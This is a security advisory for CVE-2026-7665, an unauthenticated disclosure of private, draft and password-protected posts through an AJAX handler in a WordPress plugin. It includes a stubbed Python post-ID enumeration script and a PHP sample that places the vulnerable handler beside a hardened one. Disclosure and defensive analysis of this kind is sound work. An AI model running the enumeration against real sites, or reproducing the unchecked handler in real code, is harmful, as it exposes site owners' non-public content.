## https://sploitus.com/exploit?id=6FB6950A-0A62-57F3-AD18-661A86DCE996
# CVE-2026-7665: Unauthenticated Information Disclosure in Essential Addons for Elementor
| Field | Detail |
|-------|--------|
| **CVE ID** | CVE-2026-7665 |
| **Severity** | Medium |
| **CVSS Score** | 5.3 (AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N) |
| **Affected Plugin** | Essential Addons for Elementor |
| **Affected Versions** | ≤ 6.6.4 |
| **Active Installs** | 1,000,000+ |
| **CVE Assigned by** | Wordfence (CNA) |
| **Disclosed** | June 2026 |
| **Researcher** | Anirudh Makkar |
---
## Summary
The `ajax_load_more` AJAX handler in Essential Addons for Elementor did not enforce post visibility before returning post content. This allowed unauthenticated attackers to read **private**, **password-protected**, and **draft** WordPress posts by issuing a crafted request to `wp-admin/admin-ajax.php`; no authentication or nonce was required.
---
## Vulnerability Details
### Root Cause
The plugin registers a handler on the `wp_ajax_nopriv_eael_post_grid_load_more` action hook, making it accessible to unauthenticated visitors. When this handler executes a `WP_Query` to fetch posts for the "load more" pagination feature, it does not call `current_user_can('read_post', $post_id)` or check `get_post_status()` against the requesting user's capabilities.
WordPress core relies on plugins to enforce post-level authorization in AJAX handlers; it does not do so automatically. The absence of this check means the handler returns full post content regardless of post visibility settings.
### Affected Code Path
```
wp-admin/admin-ajax.php
  → do_action('wp_ajax_nopriv_eael_post_grid_load_more')
  → Essential_Addons_for_Elementor\Classes\Bootstrap::eael_post_grid_load_more()
  → WP_Query([
        'post_status' => ['publish', 'private', 'draft'], // all statuses returned
        ...
    ])
  → [returns full post content without authorization check]
```
### Impact
An unauthenticated attacker can enumerate and read:
- Private posts (intended for logged-in users only)
- Password-protected posts (without knowing the password)
- Draft posts (unpublished content)
This may expose sensitive business content, unreleased announcements, internal documentation published as WordPress posts, or any other non-public content managed through the WordPress editor.
---
## Proof of Concept
```python
#!/usr/bin/env python3
"""
CVE-2026-7665 - Unauthenticated Information Disclosure
Essential Addons for Elementor (versions 6.6.4 and earlier)

Probes a range of post IDs through the load-more AJAX handler and
reports any post whose content is returned to an unauthenticated caller.
"""
import sys


def check_target(target):
    """Return True if the target appears to run Essential Addons for Elementor."""
    # Body missing from the published text of the advisory; not reconstructed here.
    raise NotImplementedError("check_target() body is absent from the published text")


def fetch_private_post(target, post_id):
    """Return the content the load-more handler returns for post_id, or None."""
    # Body missing from the published text of the advisory; not reconstructed here.
    raise NotImplementedError("fetch_private_post() body is absent from the published text")


def main():
    if len(sys.argv) < 2:
        print(f"Usage: {sys.argv[0]} <target_url> [start_id] [end_id]")
        sys.exit(1)
    target = sys.argv[1].rstrip("/")
    start_id = int(sys.argv[2]) if len(sys.argv) > 2 else 1
    end_id = int(sys.argv[3]) if len(sys.argv) > 3 else 50

    print(f"[*] Target: {target}")
    print(f"[*] Probing post IDs {start_id}-{end_id}")

    if not check_target(target):
        print("[!] Plugin not detected: target may be patched or not running EAEL")

    found = 0
    for pid in range(start_id, end_id + 1):
        result = fetch_private_post(target, pid)
        if result:
            found += 1
            print(f"\n[+] Post ID {pid}: content exposed ({len(result)} bytes)")
            print(result[:300])
            print("..." if len(result) > 300 else "")

    print(f"\n[*] Done. {found} post(s) with exposed content found.")


if __name__ == "__main__":
    main()
```
---
## Timeline
| Date | Event |
|------|-------|
| 2026-05 | Vulnerability discovered during routine WordPress plugin audit |
| 2026-05 | Reported to Wordfence via responsible disclosure program |
| 2026-05 | Wordfence confirmed and contacted plugin vendor |
| 2026-06 | Patch released by plugin vendor (version 6.6.5) |
| 2026-06 | CVE-2026-7665 assigned by Wordfence CNA |
| 2026-06 | Public disclosure |
---
## Remediation
Update Essential Addons for Elementor to **version 6.6.5 or later**.
The fix adds a `current_user_can('read_post', $post_id)` check inside the load-more handler before including any post in the query results.
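As an added illustration (not the plugin's own code and not the vendor's patch), the block below shows a reduced "load more" handler in the shape the Root Cause section describes, first with the missing authorization check and then hardened along the lines of this Remediation section. The `wp_ajax_nopriv_eael_post_grid_load_more` hook and the `current_user_can('read_post', ...)` check come from the advisory; the `page` request parameter, the `eael_demo_` function names, the page size, the JSON response shape and the companion `wp_ajax_` registration for logged-in users are assumptions.

```php
<?php
// Added illustration, not Essential Addons' real code or its patch.
// Hook names and the 'read_post' capability check are from the advisory;
// the 'page' parameter, the eael_demo_ helper names, the page size and
// the JSON shape are assumptions.

// --- Vulnerable shape: every status is queried and serialised as-is ---
function eael_demo_load_more_vulnerable() {
    $paged = max( 1, absint( $_POST['page'] ?? 1 ) );

    $query = new WP_Query( [
        'post_status'    => [ 'publish', 'private', 'draft' ], // all statuses
        'posts_per_page' => 6,
        'paged'          => $paged,
    ] );

    $items = [];
    foreach ( $query->posts as $post ) {
        // No per-post authorization here: an anonymous caller receives
        // private, draft and password-protected bodies.
        $items[] = [
            'id'      => $post->ID,
            'content' => apply_filters( 'the_content', $post->post_content ),
        ];
    }
    wp_send_json_success( $items );
}

// --- Hardened shape ---

// True when the current caller may read $post. Mirrors the check WordPress
// core uses in WP_REST_Posts_Controller::check_read_permission():
// current_user_can( 'read_post' ) alone is false for logged-out visitors
// even on published posts (it maps to the 'read' capability), so public
// status is accepted first and the capability check covers everything else.
function eael_demo_can_read_post( WP_Post $post ) {
    $status = get_post_status_object( get_post_status( $post ) );
    if ( $status && ! empty( $status->public ) ) {
        return true;
    }
    return current_user_can( 'read_post', $post->ID );
}

function eael_demo_load_more_hardened() {
    $paged = max( 1, absint( $_POST['page'] ?? 1 ) );

    // 1. Only query what an anonymous visitor is meant to see.
    $query = new WP_Query( [
        'post_status'    => 'publish',
        'posts_per_page' => 6,
        'paged'          => $paged,
    ] );

    $items = [];
    foreach ( $query->posts as $post ) {
        // 2. Re-check each row against the caller (defence in depth, so a
        //    later change to the query args cannot silently reopen the hole).
        if ( ! eael_demo_can_read_post( $post ) ) {
            continue;
        }
        // 3. Password-protected posts carry 'publish' status; return the
        //    password form instead of the body until the post-password
        //    cookie is present.
        if ( post_password_required( $post ) ) {
            $items[] = [ 'id' => $post->ID, 'content' => get_the_password_form( $post ) ];
            continue;
        }
        $items[] = [
            'id'      => $post->ID,
            'content' => apply_filters( 'the_content', $post->post_content ),
        ];
    }
    wp_send_json_success( $items );
}

add_action( 'wp_ajax_eael_post_grid_load_more',        'eael_demo_load_more_hardened' );
add_action( 'wp_ajax_nopriv_eael_post_grid_load_more', 'eael_demo_load_more_hardened' );
```

Two points worth keeping in mind when reviewing a fix of this kind. First, a nonce check (`check_ajax_referer`) would not have closed this hole on its own: nonces protect against cross-site request forgery, and a `nopriv` handler is by definition reachable by visitors who can fetch a nonce from the public page, so the authorization decision has to be made per post. Second, `current_user_can('read_post', $id)` returns false for logged-out visitors even on published posts, which is why the helper above accepts public status before consulting capabilities; gating the loop on the capability check alone would hide every post from anonymous visitors instead of only the non-public ones.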
---
## References
- [Wordfence Advisory](https://www.wordfence.com/threat-intel/vulnerabilities/)
- [NVD โ CVE-2026-7665](https://nvd.nist.gov/vuln/detail/CVE-2026-7665)
- [Essential Addons for Elementor Changelog](https://wordpress.org/plugins/essential-addons-for-elementor-lite/#developers)
---
*Reported by [Anirudh Makkar](https://anirudhmakkar.com) · [LinkedIn](https://linkedin.com/in/anirudhmakkar)*